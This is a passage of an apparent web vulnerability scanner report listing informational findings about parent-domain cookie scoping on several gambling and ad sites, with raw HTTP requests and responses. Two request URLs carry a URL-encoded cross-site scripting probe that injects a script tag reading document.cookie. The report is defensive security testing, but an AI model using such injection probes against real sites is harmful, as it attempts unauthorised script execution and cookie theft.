Set-Cookie: winnings[subdomain]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[lang]=it; expires=Wed, 15-Jun-2011 12:02:12 GMT; path=/; domain=.vincite.net
Set-Cookie: winnings[sessionId]=103122908; path=/; domain=.vincite.net
Set-Cookie: winnings[vid]=540294; expires=Tue, 15-May-2012 12:02:13 GMT; path=/; domain=.vincite.net
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:02:14 GMT
Connection: close
Content-Length: 23217

<!DOCTYPE html>
<html dir="ltr" lang="it-IT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La prima destinazione per vincere divertendosi online!..| Winnings.com</title>
<link rel="alt
...[SNIP]...

11.16. http://www.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.winnings.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=4ghnev4ktomhtdlm6482aj6993; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[subdomain]=www; expires=Wed, 15-Jun-2011 11:41:05 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 11:41:05 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103122734; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540130; expires=Tue, 15-May-2012 11:41:07 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 11:41:07 GMT
Content-Length: 24501

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - The #1 Destination for FUN Online Winnings Entertainment!..| Winnings.com</title>
<link rel=
...[SNIP]...

11.17. http://www.winnings.com/xmlrpc.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.winnings.com
Path:   /xmlrpc.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xmlrpc.php HTTP/1.1
Host: www.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; WinningsSID=mae3p27b7retpgqtu508ctoij2; winnings[vid]=540129; winnings[subdomain]=www; winnings[sessionId]=103122733; winnings[cc]=US;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=gpfb87spheemujmu5ahuq54h47; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.winnings.com
Set-Cookie: winnings[sessionId]=103123582; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540957; expires=Tue, 15-May-2012 12:35:10 GMT; path=/; domain=.winnings.com
Date: Mon, 16 May 2011 12:35:09 GMT
Connection: close
Content-Length: 42

XML-RPC server accepts POST requests only.

11.18. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=4000008&rn=856024745&c7=http%3A%2F%2Fwww.metacafe.com%2Ffplayer%2F%3F4702d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ebe96a23f3a3%3D1&c15=0&c8=Metacafe%20-%20Online%20Video%20Entertainment%20-%20Free%20video&c9=http%3A%2F%2Fburp%2Fshow%2F19&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 15-May-2013 12:49:29 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.19. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_6670393876&pid=d6536fd1-a88d-43f5-b56c-d55966e08548&s=728x90&f=0.56&url=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cid=oxpv1%3A34-632-1929-1558-4408&hrid=b7d3130441279250d437d1e5dbea5016-1305550329 HTTP/1.1
Host: bid.openx.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: i=de6f5b1d-dd7a-4d95-8142-2b91139d25bd; p=1305468134

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=801a3d1e-777d-48cc-89cd-b6ac2981e332; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1305550332; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_6670393876({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI3POVLDMBQG4D924ihSIE
...[SNIP]...

11.20. http://br.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3hrlta45ydrtdn55kcs1yk45; path=/; HttpOnly
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:10:00 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: UniqueVisitorID=C16CF2284F72CAB44BCB7639FE94FB79; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: LanguageCode=BRA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:10:00 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.21. http://br.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: br.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kckq0e45x234ip2s44zglqzs; path=/; HttpOnly
Set-Cookie: LanguageCode=BRA; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:02:48 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: UniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: LanguageCode=BRA; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43122


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.22. http://da.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dmowgp551rkkdn3soilwdfnr; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:13:58 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: UniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.23. http://da.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=szufvcqect3lbw2c3qkhio45; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:24:19 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: UniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.24. http://da.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1qfvcvf4rzhgeoufgbf30g55; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=DB22A1CF13A4E4246723822650A86F19&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:02:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: UniqueVisitorID=DB22A1CF13A4E4246723822650A86F19; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.25. http://da.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jerxym45yqox5445cm4l3m45; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:33:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: UniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.26. http://de.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1tkc3d3ftxfybx55a2wzek55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.27. http://de.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pitwctjdcp5uqtuzoc2m5l55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:06 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: UniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45192


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.28. http://de.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ayip0bh1mevynynz4icpq55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=388748C1F7262AA76BF3603A585497C0&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: UniqueVisitorID=388748C1F7262AA76BF3603A585497C0; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.29. http://de.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:28 GMT
